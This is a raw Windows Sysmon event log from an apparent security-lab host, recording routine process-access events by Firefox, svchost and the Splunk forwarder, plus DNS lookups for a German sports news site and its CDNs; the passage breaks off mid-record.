14:00:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.521{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-948D-6005-4005-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.520{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-948D-6005-4005-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.376{59A5CD1D-948D-6005-4005-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000017956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.516{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.504{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.435{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.423{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.420{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.419{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.419{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.419{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.419{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.418{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.827{59A5CD1D-945A-6005-3305-00000000A301}7052dydcfpm9yz2h5.cloudfront.net02600:9000:21a1:9000:0:b7af:5240:93a1;2600:9000:21a1:9600:0:b7af:5240:93a1;2600:9000:21a1:c400:0:b7af:5240:93a1;2600:9000:21a1:d800:0:b7af:5240:93a1;2600:9000:21a1:1200:0:b7af:5240:93a1;2600:9000:21a1:2c00:0:b7af:5240:93a1;2600:9000:21a1:7e00:0:b7af:5240:93a1;2600:9000:21a1:8000:0:b7af:5240:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.823{59A5CD1D-945A-6005-3305-00000000A301}7052dydcfpm9yz2h5.cloudfront.net052.222.177.12;52.222.177.43;52.222.177.48;52.222.177.84;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.823{59A5CD1D-945A-6005-3305-00000000A301}70521376624012.rsc.cdn77.org02a02:6ea0:c700::2;2a02:6ea0:c700::3;2a02:6ea0:c700::4;2a02:6ea0:c700::1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.823{59A5CD1D-945A-6005-3305-00000000A301}7052dff73782crntp.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.820{59A5CD1D-945A-6005-3305-00000000A301}7052static.kicker.de0type: 5 dydcfpm9yz2h5.cloudfront.net;::ffff:52.222.177.84;::ffff:52.222.177.12;::ffff:52.222.177.43;::ffff:52.222.177.48;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.819{59A5CD1D-945A-6005-3305-00000000A301}70521376624012.rsc.cdn77.org0195.181.175.49;195.181.175.51;195.181.175.54;195.181.175.45;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.818{59A5CD1D-945A-6005-3305-00000000A301}7052dff73782crntp.cloudfront.net099.86.7.34;99.86.7.48;99.86.7.7;99.86.7.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.818{59A5CD1D-945A-6005-3305-00000000A301}7052cdn.consentmanager.mgr.consensu.org0type: 5 1376624012.rsc.cdn77.org;::ffff:195.181.175.45;::ffff:195.181.175.49;::ffff:195.181.175.51;::ffff:195.181.175.54;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.818{59A5CD1D-945A-6005-3305-00000000A301}7052derivates.kicker.de0type: 5 dff73782crntp.cloudfront.net;::ffff:99.86.7.29;::ffff:99.86.7.34;::ffff:99.86.7.48;::ffff:99.86.7.7;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.816{59A5CD1D-945A-6005-3305-00000000A301}7052static.apester.com035.190.72.53;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.816{59A5CD1D-945A-6005-3305-00000000A301}7052static.apester.com0::ffff:35.190.72.53;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.724{59A5CD1D-945A-6005-3305-00000000A301}7052dkmnl856gd5un.cloudfront.net02600:9000:20eb:d000:16:7865:b7c0:93a1;2600:9000:20eb:fc00:16:7865:b7c0:93a1;2600:9000:20eb:1800:16:7865:b7c0:93a1;2600:9000:20eb:3e00:16:7865:b7c0:93a1;2600:9000:20eb:4600:16:7865:b7c0:93a1;2600:9000:20eb:4c00:16:7865:b7c0:93a1;2600:9000:20eb:5a00:16:7865:b7c0:93a1;2600:9000:20eb:be00:16:7865:b7c0:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.714{59A5CD1D-945A-6005-3305-00000000A301}7052dkmnl856gd5un.cloudfront.net0143.204.215.96;143.204.215.98;143.204.215.109;143.204.215.126;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.713{59A5CD1D-945A-6005-3305-00000000A301}7052www.kicker.de0type: 5 dkmnl856gd5un.cloudfront.net;::ffff:143.204.215.126;::ffff:143.204.215.96;::ffff:143.204.215.98;::ffff:143.204.215.109;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:43.393{59A5CD1D-8E56-6005-2E00-00000000A301}2464210.84.225.13.in-addr.arpa.0type: 12 server-13-225-84-210.fra2.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:43.391{59A5CD1D-8E56-6005-2E00-00000000A301}246440.100.215.91.in-addr.arpa.0type: 12 de4.ioam.de;C:\Windows\sysmon64.exe 10341000x800000000000000017930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.321{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.317{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.317{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.316{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.316{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.315{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.292{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.291{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.470{59A5CD1D-948E-6005-4105-00000000A301}38042532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program 